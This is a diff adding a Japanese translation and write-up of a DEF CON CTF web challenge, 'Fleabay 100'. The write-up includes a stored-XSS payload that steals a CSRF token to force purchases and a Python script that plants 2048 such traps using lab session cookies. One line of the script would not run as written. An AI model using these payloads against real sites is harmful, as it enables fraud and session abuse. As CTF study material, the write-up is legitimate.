Japanese original text.

--- a/dc23.openctf/dc23.openCTF.writeup.09.Fleabay_100.md
+++ b/dc23.openctf/dc23.openCTF.writeup.09.Fleabay_100.md
@@ -74,3 +74,88 @@ for i in range(2048):
 9. found the key on the page.
 
 
+## 日本語(Japanese)
+
+### 問題文
+Fleabay 100 100 --- Fleabay has gotten really popular, and Mr. Moneybags is perusing the listings - can you sell him $100,000 worth of stuff?
+10.0.66.91
+
+### 訳文
+Fleabay 100 100 --- Fleabayは本当に広く知られるようになりました。お金袋さんがリストを追っています。- 彼に $100,000 ドルの価値の物品を売れますか?
+10.0.66.91
+
+### write-up
+
+実はこのチャレンジはほとんど一緒の問題（問題名も一緒）のものが昨年出題されていました。
+※ 昨年も解けています。
+
+まずウェブページにアクセスします。
+http://10.0.66.91/
+
+サイトは、画像の売り買いができるサイトで実際にお金で購入するものになっています。
+目標は、ここで画像を売って莫大なお金を稼ぐことです。
+
+ヒントとして、「お金袋さん」がリストをしつこく見ているという情報があります。
+脆弱性をついて、彼が見ただけで買ったことにしてしまうJavascriptなりを埋め込むと良さそうです。
+
+1. まずWebページにアクセスします。
+2. アカウント登録でアカウントを作ります。
+3. 販売するための画像を登録します。
+4. ここで画像のURLを入力する部分に、タグやダブルクォーテーションが入れられることに気が付きます。
+ 
+リストでは、入力した画像URLが以下のように表示されますので、
+```
+<img src="(image field)" />
+```
+以下の様なコードを埋め込んで、リストページを見ただけで、購入させるようにしてしまいます。
+```
+<img src=""><script>var r=new XMLHttpRequest();r.open('GET','/listing/XXX/',true);r.onload=function(){if(r.status>=200&&r.status<400){var d=r.responseText;var c=d.search('csrf_token=.{12}\"');var t=d.substring(c+11,c+11+12);var s=new XMLHttpRequest();s.open('GET','/listing/XXX/?buy=1&csrf_token='+t,true);s.send();}};r.send();</script><img src="" />
+```
+ここで、XXXは画像ごとに振られるID番号です。
+
+5. ブラウザのデベロッパーツールでクッキーを確認します。以下のセッションキーとトークンで認証情報を保持しています。
+こちらの認証情報をクッキーに入れることで、ログインしている状態になることを確認しておきます。
+```
+csrftoken = "rjQFXg4rkYDnzYSykqXoUmyJ7atzIcxG"
+sessionid = "07ze6nb37o5cy1sk8rn55jbpto1skzuv"
+```
+
+6. いよいよ、上記の攻撃コードを大量にポストしてお金袋さんから大量の購入をもらうことにしましょう。
+ちなみに、金額は 4294967295（エラーメッセージでこれ以下のみの指定と出ました。親切！）
+10万ドル稼ぐので、2048個もあれば十分でしょう。
+
+exploit.py は以下のとおりです:
+```
+import urllib3 # Requires: < 1.9
+import re
+
+http = urllib3.PoolManager()
+newurl = "http://10.0.66.91/listings/new/"
+updateurl = "http://10.0.66.91/listing/%d/edit/"
+csrftoken = "rjQFXg4rkYDnzYSykqXoUmyJ7atzIcxG"
+sessionid = "07ze6nb37o5cy1sk8rn55jbpto1skzuv"
+
+def do_():
+    r = http.request_encode_body('POST', newurl, headers={"Cookie":"csrftoken=%s;sessionid=%s" % (csrftoken, sessionid)}, fields={"name":"Item 1","details":"test","image_src":"test","cost":"%u" % (2**32)-1,"csrfmiddlewaretoken":csrftoken,"submit":"Submit"},encode_multipart=False, redirect=False)
+    for urllike in re.finditer(r'http://10.0.66.91/listing/([0-9]+)/', r.headers['location']):
+        num = int(urllike.group(1))
+        r = http.request_encode_body('POST', updateurl % num, headers={"Cookie":"csrftoken=%s;sessionid=%s" % (csrftoken, sessionid)}, fields={"name":"Item %d" % num,"details":"test","image_src":"\"><script>var r=new XMLHttpRequest();r.open('GET','/listing/%(num)d/',true);r.onload=function(){if(r.status>=200&&r.status<400){var d=r.responseText;var c=d.search('csrf_token=.{12}\"');var t=d.substring(c+11,c+11+12);var s=new XMLHttpRequest();s.open('GET','/listing/%(num)d/?buy=1&csrf_token='+t,true);s.send();}};r.send();</script><img src=\"" % dict(num=num),"cost":"%u" % 4294967295 ,"csrfmiddlewaretoken":csrftoken,"Referer":updateurl % num}, encode_multipart=False, redirect=False)
+        return num
+    else:
+        raise ValueError("unexpected response: %d: %s" % (r.status, r.data.decode('utf-8')))
+
+for i in range(2048):
+    num = do_()
+    print("[+] placed XSS trap on item #%d" % num)
+```
+
+7. あとはこれを実行して待ちます。
+
+8. しばらく待って、ブラウザでログインします。
+
+9. ログインしたページで金額が 10万ドルを超えていて、画面のトップにFlagが表示されました。
+
+※ こういうクライアントサイド攻撃のCTFの問題は珍しいと思います。楽しかったです。
+
+
+
